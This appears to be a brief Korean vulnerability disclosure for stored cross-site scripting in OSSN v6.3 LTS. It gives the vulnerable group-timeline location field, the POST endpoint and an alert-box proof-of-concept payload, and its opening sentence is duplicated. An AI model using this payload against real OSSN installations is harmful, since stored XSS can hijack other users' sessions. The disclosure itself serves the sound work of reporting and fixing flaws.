
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS에서 Group Timeline 모듈을 통해 저장된 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다.
OpenTeknik LLC OSSN 오픈소스 소셜 네트워크 v6.3 LTS에서 그룹 타임라인 모듈을 통해 저장형 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다.
공격자는 저장형 XSS를 악용하기 위해 그룹 타임라인에 게시물을 올리고 XSS 페이로드를 위치 입력란에 삽입해야 합니다. XSS 페이로드는 제출 직후 실행됩니다.
http://ip_address:port/ossn/group/{number}
POST /ossn/action/wall/post/g?ossn_ts=1656419377&ossn_token=c0ee6b52f853a5073679f7a82372a0726a6a6e7d5500ec372fef9341f1e45e21
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome 버전 102.0.5005.115 (공식 빌드) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
참고 자료: